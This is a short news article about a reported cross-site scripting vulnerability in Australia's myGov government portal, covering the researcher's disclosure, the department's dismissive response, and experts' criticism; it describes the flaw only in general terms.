The Australian myGov website, the online portal for Australians to access pubic services, was recently reported as vulnerable to hacking by security expert Nick Cubrilovic. The government website, which stores sensitive and private records of millions of Australians, is said to be vulnerable to cross-site scripting. This security flaw is the most common vulnerability that is usually found during penetration tests.
Many IT security experts think that what Nick Cubrilovic did was a basic attack. This only shows that hackers can easily get pass through myGov’s security firewalls, if there are even any. myGov’s poor security is only attracting trouble.
In order to spy or steal information from the website, myGov users simply need to visit another website containing malicious code that will unknowingly extract sensitive information when the user access his myGov account. Private information are recorded on the site. Childcare, Medicare, Welfare Payments, Insurance information, e-Health and Tax declarations can be accessed by unauthorized parties anytime.
Mr. Cubrilovic reported the said vulnerabilities to the Australian government chief technology officer John Sheridan. Afterwards, the chief information security officer of the Department of Human Services (which manages my.Gov.au) responded to Mr. Cubrilovic but didn’t really address the issue.
The department also stated that data is in very safe hands and that there is nothing to worry about. Furthermore, it said it routinely test out the myGov website for any security flaw. The government agency also did not clarify whether there were actually accounts that had been highjacked.
Troy Hunt and Ty Miller, both IT security experts agree that the data recorded on the myGov website was definitely not safe. The question now is how long have these vulnerabilities existed? Millions of Australians confidently share their private records to the site, yet there is a high chance of having their myGov accounts compromised.
This serious security flaw in myGov site should be dealt with instantly. The Australian government should fix the flaw immediately to avoid any more accounts from getting highjacked.